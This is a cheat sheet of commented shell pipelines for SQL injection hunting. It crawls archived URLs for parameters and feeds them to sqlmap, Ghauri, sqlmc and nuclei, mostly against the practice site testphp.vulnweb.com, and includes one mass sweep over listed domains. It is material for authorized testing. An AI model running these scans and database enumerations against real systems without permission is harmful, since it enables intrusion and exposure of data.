SQLis

Parameter discovery

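# Collect URLs that carry query parameters for the target host.
#   -d 5        crawl depth
#   -ps / -pss  also pull URLs from the listed passive sources
#   -f qurl     print only URLs that include a query string
# The URL is passed as a plain quoted argument: wrapped in <...> the shell
# parses the brackets as redirections instead of handing katana a URL.
# sed cuts each URL after its first '=', so only the first parameter name is
# kept (with an empty value); sort -u then collapses URLs that differed only
# in parameter values, and tee saves the list while still printing it.
katana -u 'http://testphp.vulnweb.com' -d 5 \
    -ps -pss waybackarchive,commoncrawl,alienvault -f qurl \
  | sed 's/=.*/=/' \
  | sort -u \
  | tee testphp.vulnweb.com.output.txt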

SQLi detection

# Run the lostsec.py detector against testphp.vulnweb.com.output.txt, the URL
# list written by the parameter-discovery step.
#   -l  presumably the file of URLs to test
#   -p  presumably the payload list (here payloads/xor.txt)
#   -t  presumably a thread count or timeout; confirm with the script's help
# NOTE(review): sudo runs this third-party script as root. Nothing on this page
# shows that it needs elevated privileges; confirm, and drop sudo if it does not.
sudo python3 ./lostsec.py -l testphp.vulnweb.com.output.txt -p payloads/xor.txt -t 5

Ghauri

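# Test a single parameter with Ghauri; the '*' marks the injection point.
#   --batch                 answer prompts with defaults (non-interactive)
#   --confirm               re-check a finding before reporting it
#   --dbs / --current-db    list databases / show the current database
#   --hostname              show the database server's hostname
# The URL is given without the surrounding <...>: inside quotes those brackets
# reach the tool literally and make the URL invalid.
ghauri -u 'http://testphp.vulnweb.com/artists.php?artist=*' \
  --dbs --batch --confirm --hostname --current-db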

Sqlmap

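# Test a single parameter with sqlmap; the '*' marks the injection point.
#   --batch --threads=5     non-interactive, five concurrent requests
#   --random-agent          pick a random User-Agent header
#   --level=5               widest set of tested inputs (adds cookies and
#                           headers such as User-Agent, Referer and Host)
#   --risk=3                adds OR-based payloads; sqlmap's documentation notes
#                           these can modify data when the injection point sits
#                           in an UPDATE or DELETE statement, so use a lower
#                           risk value against anything that must stay intact
#   --tamper=space2comment  rewrite spaces in payloads as /**/ comments
#   -v 3                    also print each injected payload
# The URL is given without the surrounding <...>: inside quotes those brackets
# reach the tool literally and make the URL invalid.
sqlmap -u 'http://testphp.vulnweb.com/artists.php?artist=*' \
  --batch --dbs --threads=5 --random-agent \
  --risk=3 --level=5 --tamper=space2comment -v 3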

Mass error based sqli hunting

# Error-based SQLi sweep over the root domains in domain.txt (one in-scope
# domain per line).
#   subfinder    enumerate subdomains for every listed domain
#   httpx        keep only hosts that answer with HTTP 200
#   waybackurls  fetch archived URLs for those hosts
#   qsreplace/grep/sed
#                append the marker FUZZ to every query value, keep only lines
#                that received it (URLs with at least one parameter), then
#                strip the marker again
#   gf sqli      keep URLs matching the gf "sqli" pattern set
#   nuclei       run the templates in ~/pvt-template/SQLi/error-based-sqli/
#                in DAST mode and write findings to sqlis.txt
subfinder -dL domain.txt -recursive -all -silent \
  | httpx -mc 200 \
  | waybackurls \
  | qsreplace -a "FUZZ" \
  | grep "FUZZ" \
  | sed 's/FUZZ//g' \
  | gf sqli \
  | sort -u \
  | nuclei -t ~/pvt-template/SQLi/error-based-sqli/ -dast -o sqlis.txt

waymore, qsreplace, gf, ghauri

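# Archived URLs for one host -> parameterised URLs -> Ghauri, one URL at a time.
#   waymore -n -mode U   URLs only, without subdomains
#   qsreplace/grep/sed   append the marker FUZZ to every query value, keep only
#                        lines that received it, then strip the marker again
#   gf sqli              keep URLs matching the gf "sqli" pattern set
# The loop reads with 'IFS= read -r' so backslashes and surrounding whitespace
# in a URL reach ghauri unchanged; plain 'read' rewrites both.
# tee -a appends, so results from every URL accumulate in ghauri.sqli.txt.
waymore -i "testphp.vulnweb.com" -n -mode U \
  | qsreplace -a "FUZZ" \
  | grep "FUZZ" \
  | sed 's/FUZZ//g' \
  | gf sqli \
  | sort -u \
  | while IFS= read -r url; do
      ghauri -u "$url" --dbs --threads 2 --batch --level 2 \
        | tee -a ghauri.sqli.txt
    done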

waymore, qsreplace, gf, sqlmc

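# Archived URLs for one host -> parameterised URLs -> sqlmc, one URL at a time.
#   waymore -n -mode U   URLs only, without subdomains
#   qsreplace/grep/sed   append the marker FUZZ to every query value, keep only
#                        lines that received it, then strip the marker again
#   gf sqli              keep URLs matching the gf "sqli" pattern set
#   sqlmc -d 3           crawl depth 3 from each URL
# The loop reads with 'IFS= read -r' so backslashes and surrounding whitespace
# in a URL reach sqlmc unchanged; plain 'read' rewrites both.
# NOTE(review): every iteration passes the same -o sqlmc.txt; if sqlmc
# truncates its output file, only the last URL's results survive. Verify.
waymore -i "testphp.vulnweb.com" -n -mode U \
  | qsreplace -a "FUZZ" \
  | grep "FUZZ" \
  | sed 's/FUZZ//g' \
  | gf sqli \
  | sort -u \
  | while IFS= read -r url; do
      sqlmc --url "$url" -d 3 -o sqlmc.txt
    done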

waymore, qsreplace, gf, nuclei

# Archived URLs for one host -> parameterised URLs -> nuclei error-based check.
#   waymore -n -mode U   URLs only, without subdomains
#   qsreplace/grep/sed   append the marker FUZZ to every query value, keep only
#                        lines that received it, then strip the marker again
#   gf sqli              keep URLs matching the gf "sqli" pattern set
#   nuclei -dast         run the single sqli-error-based.yaml template in DAST
#                        mode and write findings to nuclei_sqli.txt
waymore -i "testphp.vulnweb.com" -n -mode U \
  | qsreplace -a "FUZZ" \
  | grep "FUZZ" \
  | sed 's/FUZZ//g' \
  | gf sqli \
  | sort -u \
  | nuclei -t ~/nuclei-templates/dast/vulnerabilities/sqli/sqli-error-based.yaml \
      -dast -o nuclei_sqli.txt

waybackurls, gf, sqlmap